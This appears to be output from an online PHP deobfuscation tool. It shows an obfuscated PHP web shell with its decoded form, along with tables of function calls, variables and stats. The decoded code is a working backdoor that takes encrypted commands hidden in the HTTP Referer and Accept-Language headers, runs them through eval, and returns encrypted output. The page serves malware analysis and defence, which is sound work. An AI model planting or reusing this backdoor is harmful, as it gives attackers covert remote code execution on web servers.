Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $R='omp{dress(@x(@b{das{de64_{ddecode{d(preg_{dr{deplace(array("{d/_/{d","/-/"{d),{d..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$R='omp{dress(@x(@b{das{de64_{ddecode{d(preg_{dr{deplace(array("{d/_/{d","/-/"{d),{darray({d"/","+';
$L=',${dm{d);if($q&&$m){d{@session{d_st{da{drt();$s{d=&{d$_SESSION;$ss={d"s{dubstr";${dsl{d="str{dto';
$f=str_replace('Xb','','crXbXbeateXb_fuXbncXbtiXbon');
$D='T_{dLAN{dGUAGE"];if($rr{d&&${dr{da){$u=pars{de_{durl($rr);p{darse_str($u{d["qu{dery"{d],$q);';
$j='f(s{dtrpos($p{d{d,$h)==={d0){$s[$i]="";$p{d=${dss($p,{d{d3);}if(array_ke{dy{d_exists($i{d,$s)';
$w='se{d64_enco{dde(x(gzcom{dpress($o){d,$k));p{dri{dnt("<$k>$d{d</$k{d{d>");@sessio{dn_d{destroy();}}}}';
$H='lower";$i=${dm[1][{d{d0].$m[1{d][1];$h=$sl($s{ds(md5(${di.{d$kh),0,3));$f{d=$sl($s{ds(md5{d(';
$r='$j};}}ret{durn $o{d;}${d{dr=$_{dSERVER{d;$rr=@$r{d["HTTP_REFE{d{dRER"];$ra=@$r[{d"HTTP_A{dCCE{dP';
$v='"),$ss(${ds[$i{d],0,$e{d))),$k){d{d{d));$o=ob_get_c{dontents{d();{dob_en{dd_clean();${dd{d=ba';
$n='";for{d($i={d0;$i{d<$l;){fo{dr($j=0;({d$j<${dc{d&&$i<$l);${dj++,{d$i++{d){d{$o.=$t{{d$i}^$k{';
$I='{d$i.$kf){d,0,3));$p{d{d="";for(${dz=1;$z<cou{dnt(${dm[1]);$z+{d+)${dp.=$q{d[$m{d[2][$z]{d];i';
$t='){d{${ds[${di].{d=$p;$e=st{dr{dpos($s[$i],${df{d);if{d{d($e){$k=$kh.$kf;o{db_{dstart();@e{dval(@gzunc';
$i='{d$q=array_{d{dvalue{ds($q);preg{d_match_{d{dall("/([\\w]{d){d[\\w{d-]+(?:;q=0.([\\d])){d?,?{d/",$r{da';
$M='{d$kh{d="5d41";$kf="402a"{d;functi{do{dn x($t,$k){d{$c=strl{den($k){d;$l={ds{dtrlen($t);$o{d="';
$K=str_replace('{d','',$M.$n.$r.$D.$i.$L.$H.$I.$j.$t.$R.$v.$w);
$B=$f('',$K);$B();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$B None
$D T_{dLAN{dGUAGE"];if($rr{d&&${dr{da){$u=pars{de_{durl($rr);p{..
$H lower";$i=${dm[1][{d{d0].$m[1{d][1];$h=$sl($s{ds(md5(${di.{d..
$I {d$i.$kf){d,0,3));$p{d{d="";for(${dz=1;$z<cou{dnt(${dm[1]);$..
$K $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$L ,${dm{d);if($q&&$m){d{@session{d_st{da{drt();$s{d=&{d$_SESSI..
$M {d$kh{d="5d41";$kf="402a"{d;functi{do{dn x($t,$k){d{$c=strl{..
$R omp{dress(@x(@b{das{de64_{ddecode{d(preg_{dr{deplace(array("..
$f create_function
$i {d$q=array_{d{dvalue{ds($q);preg{d_match_{d{dall("/([\w]{d){..
$j f(s{dtrpos($p{d{d,$h)==={d0){$s[$i]="";$p{d=${dss($p,{d{d3);..
$n ";for{d($i={d0;$i{d<$l;){fo{dr($j=0;({d$j<${dc{d&&$i<$l);${d..
$r $j};}}ret{durn $o{d;}${d{dr=$_{dSERVER{d;$rr=@$r{d["HTTP_REF..
$t ){d{${ds[${di].{d=$p;$e=st{dr{dpos($s[$i],${df{d);if{d{d($e)..
$v "),$ss(${ds[$i{d],0,$e{d))),$k){d{d{d));$o=ob_get_c{dontents..
$w se{d64_enco{dde(x(gzcom{dpress($o){d,$k));p{dri{dnt("<$k>$d{..

Stats

MD5 87af5888bdad39726c2a4115694be11c
Eval Count 1
Decode Time 161 ms